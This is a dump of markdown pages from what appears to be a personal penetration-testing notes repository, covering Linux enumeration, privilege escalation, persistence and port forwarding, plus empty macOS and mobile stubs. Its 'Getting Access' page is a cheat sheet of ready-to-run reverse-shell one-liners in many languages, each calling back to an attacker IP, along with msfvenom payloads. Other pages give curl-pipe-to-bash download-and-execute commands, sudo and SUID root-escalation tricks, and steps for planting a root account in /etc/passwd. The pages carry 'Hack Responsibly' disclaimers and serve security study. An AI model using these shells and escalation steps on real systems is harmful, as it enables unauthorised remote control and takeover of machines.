$lport -j DNAT --to-destination $ip:$rport 178 | iptables -A FORWARD -p tcp -d $ip --dport $rport -m state --state NEW,ESTABLISHED,RELATED -j ACCEPT 179 | ``` 180 | 181 | ## Port Forwarding with netcat 182 | 183 | Forward traffic using netcat and a named pipe. 184 | 185 | ```bash 186 | mknod $mypipe p 187 | nc -l -p $lport < $mypipe | nc $ip $rport > $mypipe 188 | ``` 189 | -------------------------------------------------------------------------------- /linux-1/linux.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: 'Sorted Linux notes, need to separate to different pages and reorganize' 3 | --- 4 | 5 | # Linux Notes 6 | 7 | ## Linux 8 | 9 | Website for searching for shells through random programs such as 'vi' "living off the land binaries": [GTFObins](https://gtfobins.github.io/) 10 | 11 | ### Enumeration 12 | 13 | find files user has access to: 14 | 15 | ```bash 16 | find / -user -ls 2>/dev/null 17 | ``` 18 | 19 | `which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp 2>/dev/null` - Check if each of these useful programs are installed on the machine \(only shows the ones currently installed\). 20 | 21 | [Linux Privilege Checker](https://github.com/sleventyeleven/linuxprivchecker/blob/master/linuxprivchecker.py) 22 | 23 | full linux enumeration: 24 | 25 | * [LinEnum.sh](https://github.com/rebootuser/LinEnum) 26 | * [LinPEAS.sh](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS) 27 | 28 | download **and** execute script \(such as LinEnum.sh\) \[from remote host\]: `curl /LinEnum.sh | bash` 29 | 30 | Locate exploits: 31 | 32 | ```bash 33 | searchsploit 34 | 35 | #to pull exploit code: 36 | searchsploit -x 37 | ``` 38 | 39 | enumerate running processes: [`pspy`](https://github.com/DominicBreuker/pspy) 40 | 41 | `ps -U root -u root ux` View all processes started by a certain user \(`root` in this case\) 42 | 43 | enumeration multi-tool: [Sparta](https://sparta.secforce.com/) \(does nmap, hydra, nikto, sqlscan, ssl...\) 44 | 45 | Semi-automated enumeration all-in-one \(use this!\): [nmapAutomator](https://github.com/21y4d/nmapAutomator) 46 | 47 | Unix hardening tool that can be used for enumeration: [Bastille](http://bastille-linux.sourceforge.net/) 48 | 49 | enumerate info about current processes running from: `/proc/self/status` 50 | 51 | ### Upgrade shells: 52 | 53 | ```text 54 | 1. python -c 'import pty; pty.spawn("/bin/sh")' 55 | 2. perl -e 'exec "/bin/sh";' 56 | 3. ruby -e 'exec "/bin/sh"' 57 | ``` 58 | 59 | To upgrade to fully interactive shell \(python example\): 60 | 61 | ```bash 62 | python -c 'import pty;pty.spawn("/bin/bash")'; 63 | ctrl-z #[to background] 64 | stty raw -echo; 65 | fg #[to return shell to foreground] 66 | export TERM=xterm 67 | ``` 68 | 69 | php shell: `` 70 | 71 | bash reverse shell: 72 | 73 | ```text 74 | bash -i >& /dev/tct/10.10.14.148/9001 0>&1 75 | 76 | #URL encoded: 77 | bash+-i+>%26+/dev/tcp/10.10.14.148/9001+0>%261 78 | ``` 79 | 80 | ### Privilege Escalation 81 | 82 | [https://payatu.com/guide-linux-privilege-escalation](https://payatu.com/guide-linux-privilege-escalation) 83 | 84 | list user's sudo permissions: `sudo -l` 85 | 86 | execute any command while in `less`: `!` 87 | 88 | Privilege Escalation to Root by setting suid on `/bin/less`: `chmod 47555 /bin/less` 89 | 90 | Privilege Escalation to Root with `find`: `sudo find /etc -exec sh -i \;` 91 | 92 | wildcard injection: \[NEED MORE HERE\] 93 | 94 | ```bash 95 | mawk 'BEGIN {system("/bin/sh")}' 96 | ``` 97 | 98 | If your user can `sudo` any of these text editors: 99 | 100 | ```bash 101 | 1. [user@localhost]$ sudo vi 102 | 2. :shell 103 | 3. [root@localhost]# 104 | 105 | 1. [user@localhost]$ sudo less file.txt 106 | 2. !bash 107 | 3. [root@localhost]# 108 | 109 | 1. [user@localhost]$ sudo more long_file.txt 110 | 2. !bash 111 | 3. [root@localhost]# 112 | Note: for this method to work, the attacker has to read a file that is longer than one page 113 | ``` 114 | 115 | ### Remote Code Execution 116 | 117 | [https://www.cyberciti.biz/faq/linux-unix-osx-bsd-ssh-run-command-on-remote-machine-server/](https://www.cyberciti.biz/faq/linux-unix-osx-bsd-ssh-run-command-on-remote-machine-server/) Run commands on remote system without a shell through SSH with a "Herefile" 118 | 119 | ```text 120 | ssh server1 << HERE 121 | command1 122 | command2 123 | HERE 124 | ``` 125 | 126 | ### Misc Linux 127 | 128 | Raw memory location so no files on disk: `/dev/shm/` 129 | 130 | list all running commands: 131 | 132 | ```bash 133 | ps -eo command` 134 | #change delimiter to \n instead of (loop by line): 135 | IFS=$'\n' 136 | #Then loop through each line in output: 137 | for i in $(ps -eo command); do echo $i; done 138 | ``` 139 | 140 | [https://unix.stackexchange.com/questions/211817/copy-the-contents-of-a-file-into-the-clipboard-without-displaying-its-contents](https://unix.stackexchange.com/questions/211817/copy-the-contents-of-a-file-into-the-clipboard-without-displaying-its-contents) script to copy contents of file directly to clipboard; Save in PATH location then enjoy! 141 | 142 | ```text 143 | #! /bin/bash 144 | xclip -selection clipboard -i $@ 145 | ``` 146 | 147 | 'new' netstat: `ss -lnp | grep 9001` \#check if any connections on port 9001 148 | 149 | copy files to local machine without file transfer: 150 | 151 | ```bash 152 | base64 -w 0 /path/of/file/name.file 153 | #copy base64 then: 154 | echo -n | base64 -d > filename.file 155 | ``` 156 | 157 | pretty print JSON text in console \([https://www.howtogeek.com/529219/how-to-parse-json-files-on-the-linux-command-line-with-jq/](https://www.howtogeek.com/529219/how-to-parse-json-files-on-the-linux-command-line-with-jq/)\). Pipe the JSON output to `jq`. Example from NASA ISS API: `curl -s http://api.open-notify.org/iss-now.json | jq` 158 | 159 | ### Check encoding of a text file 160 | 161 | `vi -c 'let $enc = &fileencoding | execute "!echo Encoding: $enc" | q' ` check encoding of a text file \(needed especially when doing crypto with python, or cracking passwords with `rockyou.txt` - _hint: needs latin encoding!_\) [https://vim.fandom.com/wiki/Bash\_file\_encoding\_alias](https://vim.fandom.com/wiki/Bash_file_encoding_alias) \(how to make an alias for the above command\) 162 | 163 | -------------------------------------------------------------------------------- /linux-1/linux/README.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: 'Sorted Linux notes, need to separate to different pages and reorganize' 3 | --- 4 | 5 | # Red Team Notes 6 | 7 | {% hint style="success" %} 8 | Hack Responsibly. 9 | 10 | Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here. 11 | {% endhint %} 12 | 13 | ## Linux 14 | 15 | Website for searching for shells through random programs such as '5KFB6' 'vi' "living off the land binaries": [GTFObins](https://gtfobins.github.io/) 16 | 17 | 18 | 19 | ## 20 | 21 | ## Remote Code Execution 22 | 23 | Run commands on remote system without a shell through SSH with a "Herefile". `HERE` can be anything, but it must begin and end with the same word. [https://www.cyberciti.biz/faq/linux-unix-osx-bsd-ssh-run-command-on-remote-machine-server/](https://www.cyberciti.biz/faq/linux-unix-osx-bsd-ssh-run-command-on-remote-machine-server/) 24 | 25 | ```text 26 | ssh @ << HERE 27 | 28 | 29 | HERE 30 | ``` 31 | 32 | ## Misc Linux 33 | 34 | Raw memory location so no files on disk: `/dev/shm/` 35 | 36 | list all running commands: 37 | 38 | ```bash 39 | ps -eo command` 40 | #change delimiter to \n instead of (loop by line): 41 | IFS=$'\n' 42 | #Then loop through each line in output: 43 | for i in $(ps -eo command); do echo $i; done 44 | ``` 45 | 46 | [https://unix.stackexchange.com/questions/211817/copy-the-contents-of-a-file-into-the-clipboard-without-displaying-its-contents](https://unix.stackexchange.com/questions/211817/copy-the-contents-of-a-file-into-the-clipboard-without-displaying-its-contents) script to copy contents of file directly to clipboard; Save in PATH location then enjoy! 47 | 48 | ```text 49 | #! /bin/bash 50 | xclip -selection clipboard -i $@ 51 | ``` 52 | 53 | 'new' netstat: `ss -lnp | grep 9001` \#check if any connections on port 9001 54 | 55 | copy files to local machine without file transfer: 56 | 57 | ```bash 58 | base64 -w 0 /path/of/file/name.file 59 | #copy base64 then: 60 | echo -n | base64 -d > filename.file 61 | ``` 62 | 63 | pretty print JSON text in console \([https://www.howtogeek.com/529219/how-to-parse-json-files-on-the-linux-command-line-with-jq/](https://www.howtogeek.com/529219/how-to-parse-json-files-on-the-linux-command-line-with-jq/)\). Pipe the JSON output to `jq`. Example from NASA ISS API: `curl -s http://api.open-notify.org/iss-now.json | jq` 64 | 65 | ### Check encoding of a text file 66 | 67 | `vi -c 'let $enc = &fileencoding | execute "!echo Encoding: $enc" | q' ` check encoding of a text file \(needed especially when doing crypto with python, or cracking passwords with `rockyou.txt` - _hint: needs latin encoding!_\) [https://vim.fandom.com/wiki/Bash\_file\_encoding\_alias](https://vim.fandom.com/wiki/Bash_file_encoding_alias) \(how to make an alias for the above command\) 68 | 69 | -------------------------------------------------------------------------------- /linux-1/linux/enumeration.md: -------------------------------------------------------------------------------- 1 | # Enumeration 2 | 3 | {% hint style="success" %} 4 | Hack Responsibly. 5 | 6 | Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here. 7 | {% endhint %} 8 | 9 | ### Enumeration 10 | 11 | find files user has access to: 12 | 13 | ```bash 14 | find / -user -ls 2>/dev/null 15 | ``` 16 | 17 | `which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp 2>/dev/null` - Check if each of these useful programs are installed on the machine \(only shows the ones currently installed\). 18 | 19 | [Linux Privilege Checker](https://github.com/sleventyeleven/linuxprivchecker/blob/master/linuxprivchecker.py) 20 | 21 | full linux enumeration: 22 | 23 | * [LinEnum.sh](https://github.com/rebootuser/LinEnum) 24 | * [LinPEAS.sh](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS) 25 | 26 | download **and** execute script \(such as LinEnum.sh\) \[from remote host\]: `curl /LinEnum.sh | bash` 27 | 28 | Locate exploits: 29 | 30 | ```bash 31 | searchsploit 32 | 33 | #to pull exploit code: 34 | searchsploit -x 35 | ``` 36 | 37 | enumerate running processes: `pspy (TODO: find github and link it)` 38 | 39 | `ps -U root -u root ux` View all processes started by a certain user \(`root` in this case\) 40 | 41 | enumeration multi-tool: [Sparta](https://sparta.secforce.com/) \(does nmap, hydra, nikto, sqlscan, ssl...\) 42 | 43 | Semi-automated enumeration all-in-one \(use this!\): [nmapAutomator](https://github.com/21y4d/nmapAutomator) 44 | 45 | Unix hardening tool that can be used for enumeration: [Bastille](http://bastille-linux.sourceforge.net/) 46 | 47 | enumerate info about current processes running from: `/proc/self/status` 48 | 49 | -------------------------------------------------------------------------------- /linux-1/linux/getting-access.md: -------------------------------------------------------------------------------- 1 | # Getting Access 2 | 3 | {% hint style="success" %} 4 | Hack Responsibly. 5 | 6 | Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here. 7 | {% endhint %} 8 | 9 | ## Reverse Shells 10 | 11 | TODO: description and methodology for each section \(as needed\) 12 | 13 | ### Reverse Shell as a Service - [https://shell.now.sh](https://shell.now.sh) 14 | 15 | [https://github.com/lukechilds/reverse-shell](https://github.com/lukechilds/reverse-shell) 16 | 17 | ```bash 18 | curl https://shell.now.sh/: | sh 19 | ``` 20 | 21 | ### **Bash Reverse Shells** 22 | 23 | #### **TCP:** 24 | 25 | ```bash 26 | bash -i >& /dev/tcp/192.168.1.2/4444 0>&1 27 | ``` 28 | 29 | #### **UDP:** 30 | 31 | ```bash 32 | sh -i >& /dev/udp/192.168.1.2/5555 0>&1 33 | ``` 34 | 35 | ### Python Reverse Shells 36 | 37 | ```python 38 | python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.15.57",8099));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' 39 | ``` 40 | 41 | ```python 42 | export RHOST="192.168.1.2";export RPORT=4444;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")' 43 | ``` 44 | 45 | ```python 46 | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.2",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")' 47 | ``` 48 | 49 | ### **PHP Reverse Shell** 50 | 51 | ```php 52 | php -r '$sock=fsockopen("192.168.1.2",80);exec("/bin/sh -i <&3 >&3 2>&3");' 53 | ``` 54 | 55 | ```php 56 | php -r '$sock=fsockopen("192.168.1.2",4444);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);' 57 | ``` 58 | 59 | simple php command injection: `` 60 | 61 | ### **Ruby Reverse Shell** 62 | 63 | ```ruby 64 | ruby -rsocket -e'f=TCPSocket.open("192.168.1.2",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' 65 | ``` 66 | 67 | ### **Telnet Reverse Shells** 68 | 69 | ```bash 70 | telnet ATTACKING-IP 80 | /bin/bash | telnet 192.168.1.2 4444 71 | ``` 72 | 73 | ```bash 74 | rm -f /tmp/p; mknod /tmp/p p && telnet 192.168.1.2 4444 0/tmp/p 75 | ``` 76 | 77 | ### **Netcat Reverse Shells** 78 | 79 | ```bash 80 | nc -e /bin/sh 192.168.1.2 80 81 | ``` 82 | 83 | ```bash 84 | rm -f /tmp/p; mknod /tmp/p p && nc 192.168.1.2 4444 0/tmp/p 85 | ``` 86 | 87 | ### **Socat Reverse Shell** 88 | 89 | ```text 90 | socat tcp-connect:: exec:"bash -li",pty,stderr,setsid,sigint,sane 91 | ``` 92 | 93 | ### **Golang Reverse Shell** 94 | 95 | ```text 96 | echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","192.168.1.2:4444");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go 97 | ``` 98 | 99 | ### **Perl Reverse Shell** 100 | 101 | ```text 102 | perl -e 'use Socket;$i="192.168.1.2";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' 103 | ``` 104 | 105 | ### **Awk Reverse Shell** 106 | 107 | ```text 108 | awk 'BEGIN {s = "/inet/tcp/0/192.168.1.2/4444"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null 109 | ``` 110 | 111 | ### **NodeJS Reverse Shell** 112 | 113 | ```text 114 | require('child_process').exec('nc -e /bin/sh 192.168.1.2 4444') 115 | ``` 116 | 117 | ### **C Reverse Shell** 118 | 119 | ```text 120 | #include 121 | #include 122 | #include 123 | #include 124 | #include 125 | 126 | int main () 127 | 128 | { 129 | const char* ip = "192.168.1.2"; 130 | struct sockaddr_in addr; 131 | addr.sin_family = AF_INET; 132 | addr.sin_port = htons(4444); 133 | inet_aton(ip, &addr.sin_addr); 134 | int sockfd = socket(AF_INET, SOCK_STREAM, 0); 135 | connect(sockfd, (struct sockaddr *)&addr, sizeof(addr)); 136 | for (int i = 0; i < 3; i++) 137 | { 138 | dup2(sockfd, i); 139 | } 140 | execve("/bin/sh", NULL, NULL); 141 | return 0; 142 | } 143 | ``` 144 | 145 | ### **Meterpreter Reverse Shells** 146 | 147 | * **Linux Non-Staged reverse TCP** 148 | 149 | ```text 150 | msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f elf >reversetcp.elf 151 | ``` 152 | 153 | * **Linux Staged reverse TCP** 154 | 155 | ```text 156 | msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=4444 -f elf >reversetcp.elf 157 | ``` 158 | 159 | ## Upgrading remote shells 160 | 161 | ### Upgrade to fully interactive shell \(python example\): 162 | 163 | ```bash 164 | python -c 'import pty;pty.spawn("/bin/bash")'; 165 | ctrl-z #send to background 166 | stty raw -echo #https://stackoverflow.com/questions/22832933/what-does-stty-raw-echo-do-on-os-x 167 | stty -a #get local number of rows & columns 168 | fg #to return shell to foreground 169 | stty rows columns #Set remote shell to x number of rows & y columns 170 | export TERM=xterm-256color #allows you to clear console, and have color output 171 | ``` 172 | 173 | ### Other Languages: 174 | 175 | ```python 176 | 1. python -c 'import pty; pty.spawn("/bin/sh")' 177 | 2. perl -e 'exec "/bin/sh";' 178 | 3. ruby -e 'exec "/bin/sh"' 179 | ``` 180 | 181 | ## Misc unsorted 182 | 183 | ```bash 184 | bash -i >& /dev/tct/10.10.14.148/9001 0>&1 185 | 186 | #URL encoded: 187 | bash+-i+>%26+/dev/tcp/10.10.14.148/9001+0>%261 188 | ``` 189 | 190 | #### Bash 191 | 192 | Some versions of [bash can send you a reverse shell](http://www.gnucitizen.org/blog/reverse-shell-with-bash/) \(this was tested on Ubuntu 10.10\): 193 | 194 | ```text 195 | bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 196 | ``` 197 | 198 | #### PERL 199 | 200 | Here’s a shorter, feature-free version of the [perl-reverse-shell](http://pentestmonkey.net/tools/web-shells/perl-reverse-shell): 201 | 202 | ```text 203 | perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' 204 | ``` 205 | 206 | There’s also an [alternative PERL revere shell here](http://www.plenz.com/reverseshell). 207 | 208 | #### Python 209 | 210 | This was tested under Linux / Python 2.7: 211 | 212 | ```text 213 | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' 214 | ``` 215 | 216 | #### PHP 217 | 218 | This code assumes that the TCP connection uses file descriptor 3. This worked on my test system. If it doesn’t work, try 4, 5, 6… 219 | 220 | ```text 221 | php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' 222 | ``` 223 | 224 | If you want a .php file to upload, see the more featureful and robust [php-reverse-shell](http://pentestmonkey.net/tools/web-shells/php-reverse-shell). 225 | 226 | #### Ruby 227 | 228 | ```text 229 | ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' 230 | ``` 231 | 232 | #### Netcat 233 | 234 | Netcat is rarely present on production systems and even if it is there are several version of netcat, some of which don’t support the -e option. 235 | 236 | ```text 237 | nc -e /bin/sh 10.0.0.1 1234 238 | ``` 239 | 240 | If you have the wrong version of netcat installed, [Jeff Price points out here](http://www.gnucitizen.org/blog/reverse-shell-with-bash/#comment-127498) that you might still be able to get your reverse shell back like this: 241 | 242 | ```text 243 | rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f 244 | ``` 245 | 246 | #### Java 247 | 248 | ```text 249 | r = Runtime.getRuntime() 250 | p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) 251 | p.waitFor() 252 | ``` 253 | 254 | #### xterm 255 | 256 | One of the simplest forms of reverse shell is an xterm session. The following command should be run on the server. It will try to connect back to you \(10.0.0.1\) on TCP port 6001. 257 | 258 | ```text 259 | xterm -display 10.0.0.1:1 260 | ``` 261 | 262 | To catch the incoming xterm, start an X-Server \(:1 – which listens on TCP port 6001\). One way to do this is with Xnest \(to be run on your system\): 263 | 264 | ```text 265 | Xnest :1 266 | ``` 267 | 268 | You’ll need to authorize the target to connect to you \(command also run on your host\): 269 | 270 | ```text 271 | xhost +targetip 272 | ``` 273 | 274 | ## Resources 275 | 276 | * [http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) 277 | * [https://bernardodamele.blogspot.com/2011/09/reverse-shells-one-liners.html](https://bernardodamele.blogspot.com/2011/09/reverse-shells-one-liners.html) 278 | 279 | -------------------------------------------------------------------------------- /linux-1/linux/persistance.md: -------------------------------------------------------------------------------- 1 | # Persistence 2 | 3 | {% hint style="success" %} 4 | Hack Responsibly. 5 | 6 | Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here. 7 | {% endhint %} 8 | 9 | ## Cron 10 | 11 | ## Startup Scripts 12 | 13 | Add script to run at startup: `update-rc.d defaults` \(needs 755 permissions\) 14 | 15 | ## Accounts 16 | 17 | ### Add Account and/or Password to /etc/passwd 18 | 19 | Generate password: 20 | 21 | `openssl passwd -1 -salt ` 22 | 23 | Then add to `/etc/passwd` file. The format is:`::::root:/root:/bin/bash` 24 | 25 | -------------------------------------------------------------------------------- /macos/hardening-and-configuration.md: -------------------------------------------------------------------------------- 1 | # Hardening & Configuration 2 | 3 | {% hint style="success" %} 4 | Hack Responsibly. 5 | 6 | Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.‌ 7 | {% endhint %} 8 | 9 | 10 | Nothing here yet...please feel free to contribute 5KFB6 at [https://www.github.com/zweilosec](https://github.com/zweilosec)​ 11 | 12 | ## Resources 13 | 14 | * [https://github.com/ernw/hardening/blob/master/operating\_system/osx/10.14/ERNW\_Hardening\_OS\_X\_Mojave.md](https://github.com/ernw/hardening/blob/master/operating_system/osx/10.14/ERNW_Hardening_OS_X_Mojave.md) 15 | * 16 | -------------------------------------------------------------------------------- /macos/macos-basics.md: -------------------------------------------------------------------------------- 1 | # MacOS Basics 2 | 3 | {% hint style="success" %} 4 | Hack Responsibly. 5 | 6 | Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.‌ 7 | {% endhint %} 8 | 9 | {% hint style="danger" %} 10 | Not much here yet...please feel free to contribute at [my GitHub page](https://github.com/zweilosec/Infosec-Notes). 11 | {% endhint %} 12 | -------------------------------------------------------------------------------- /macos/macos-hardening.md: -------------------------------------------------------------------------------- 1 | # Hardening & Configuration 2 | 3 | {% hint style="success" %} 4 | Hack Responsibly. 5 | 6 | Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.‌ 7 | {% endhint %} 8 | 9 | {% hint style="danger" %} 10 | Not much here yet...please feel free to contribute at [my GitHub page](https://github.com/zweilosec/Infosec-Notes). 11 | {% endhint %} 12 | 13 | ## Resources 14 | 15 | * [https://github.com/ernw/hardening/blob/master/operating\_system/osx/10.14/ERNW\_Hardening\_OS\_X\_Mojave.md](https://github.com/ernw/hardening/blob/master/operating\_system/osx/10.14/ERNW\_Hardening\_OS\_X\_Mojave.md) 16 | * 17 | -------------------------------------------------------------------------------- /macos/macos-redteam/README.md: -------------------------------------------------------------------------------- 1 | # Red Team Notes 2 | 3 | {% hint style="success" %} 4 | Hack Responsibly. 5 | 6 | Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.‌ 7 | {% endhint %} 8 | 9 | {% hint style="danger" %} 10 | Not much here yet...please feel free to contribute at [my GitHub page](https://github.com/zweilosec/Infosec-Notes). 11 | {% endhint %} 12 | 13 | MacOS is Unix-based. Therefore, a lot of things that work for Linux may also work here. I will not duplicate notes between the two, but may make links to things that I know work across the systems.\ 14 | -------------------------------------------------------------------------------- /macos/macos-redteam/enumeration.md: -------------------------------------------------------------------------------- 1 | # Enumeration 2 | 3 | {% hint style="success" %} 4 | Hack Responsibly. 5 | 6 | Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.‌ 7 | {% endhint %} 8 | 9 | {% hint style="danger" %} 10 | Not much here yet...please feel free to contribute at [my GitHub page](https://github.com/zweilosec/Infosec-Notes). 11 | {% endhint %} 12 | -------------------------------------------------------------------------------- /macos/macos-redteam/getting-access.md: -------------------------------------------------------------------------------- 1 | # Getting Access 2 | 3 | {% hint style="success" %} 4 | Hack Responsibly. 5 | 6 | Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.‌ 7 | {% endhint %} 8 | 9 | {% hint style="danger" %} 10 | Not much here yet...please feel free to contribute at [my GitHub page](https://github.com/zweilosec/Infosec-Notes). 11 | {% endhint %} 12 | -------------------------------------------------------------------------------- /macos/macos-redteam/persistence.md: -------------------------------------------------------------------------------- 1 | # Persistence 2 | 3 | {% hint style="success" %} 4 | Hack Responsibly. 5 | 6 | Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.‌ 7 | {% endhint %} 8 | 9 | {% hint style="danger" %} 10 | Not much here yet...please feel free to contribute at [my GitHub page](https://github.com/zweilosec/Infosec-Notes). 11 | {% endhint %} 12 | -------------------------------------------------------------------------------- /macos/macos-redteam/privilege-escalation.md: -------------------------------------------------------------------------------- 1 | # Privilege Escalation 2 | 3 | {% hint style="success" %} 4 | Hack Responsibly. 5 | 6 | Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.‌ 7 | {% endhint %} 8 | 9 | {% hint style="danger" %} 10 | Not much here yet...please feel free to contribute at [my GitHub page](https://github.com/zweilosec/Infosec-Notes). 11 | {% endhint %} 12 | -------------------------------------------------------------------------------- /macos/red-team-notes/README.md: -------------------------------------------------------------------------------- 1 | # Red Team Notes 2 | 3 | {% hint style="success" %} 4 | Hack Responsibly. 5 | 6 | Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.‌ 7 | {% endhint %} 8 | 9 | 10 | Nothing here yet...please feel free to contribute 5KFB6 at [https://www.github.com/zweilosec](https://github.com/zweilosec)​ 11 | 12 | 13 | 14 | MacOS is Unix-based. Therefore, a lot of things that work for Linux may also work here. I will not duplicate notes between the two, but may make links to things that I know work across the systems. 15 | 16 | 17 | -------------------------------------------------------------------------------- /macos/red-team-notes/enumeration.md: -------------------------------------------------------------------------------- 1 | # Enumeration 2 | 3 | {% hint style="success" %} 4 | Hack Responsibly. 5 | 6 | Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.‌ 7 | {% endhint %} 8 | 9 | Nothing here yet...please feel free to contribute at [https://www.github.com/zweilosec](https://github.com/zweilosec)​ 10 | 11 | -------------------------------------------------------------------------------- /macos/red-team-notes/getting-access.md: -------------------------------------------------------------------------------- 1 | # Getting Access 2 | 3 | {% hint style="success" %} 4 | Hack Responsibly. 5 | 6 | Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.‌ 7 | {% endhint %} 8 | 9 | 10 | Nothing here yet...please feel free to contribute at [https://www.github.com/zweilosec](https://github.com/zweilosec)​ 11 | 12 | -------------------------------------------------------------------------------- /macos/red-team-notes/persistence.md: -------------------------------------------------------------------------------- 1 | # Persistence 2 | 3 | {% hint style="success" %} 4 | Hack Responsibly. 5 | 6 | Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.‌ 7 | {% endhint %} 8 | 9 | 10 | Nothing here yet...please feel free to contribute at [https://www.github.com/zweilosec](https://github.com/zweilosec)​ 11 | 12 | -------------------------------------------------------------------------------- /macos/red-team-notes/privilege-escalation.md: -------------------------------------------------------------------------------- 1 | # Privilege Escalation 2 | 3 | {% hint style="success" %} 4 | Hack Responsibly. 5 | 6 | Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.‌ 7 | {% endhint %} 8 | 9 | 10 | Nothing here yet...please feel free to contribute at [https://www.github.com/zweilosec](https://github.com/zweilosec)​ 11 | 12 | -------------------------------------------------------------------------------- /mobile/android.md: -------------------------------------------------------------------------------- 1 | # Android 2 | 3 | {% hint style="success" %} 4 | Hack Responsibly. 5 | 6 | Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here. 7 | {% endhint %} 8 | 9 | {% hint style="danger" %} 10 | Not much here yet...please feel free to contribute at [my GitHub page](https://github.com/zweilosec/Infosec-Notes). 11 | {% endhint %} 12 | 13 | ## MISC 14 | 15 | signing APK files: [IppSec:HHC2016 - Debug](https://www.youtube.com/watch?v=fcemTQaosOQ) 16 | -------------------------------------------------------------------------------- /mobile/ios.md: -------------------------------------------------------------------------------- 1 | # iOS 2 | 3 | {% hint style="success" %} 4 | Hack Responsibly. 5 | 6 | Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here. 7 | {% endhint %} 8 | 9 | {% hint style="danger" %} 10 | Not much here yet...please feel free to contribute at [my GitHub page](https://github.com/zweilosec/Infosec-Notes). 11 | {% endhint %} 12 | -------------------------------------------------------------------------------- 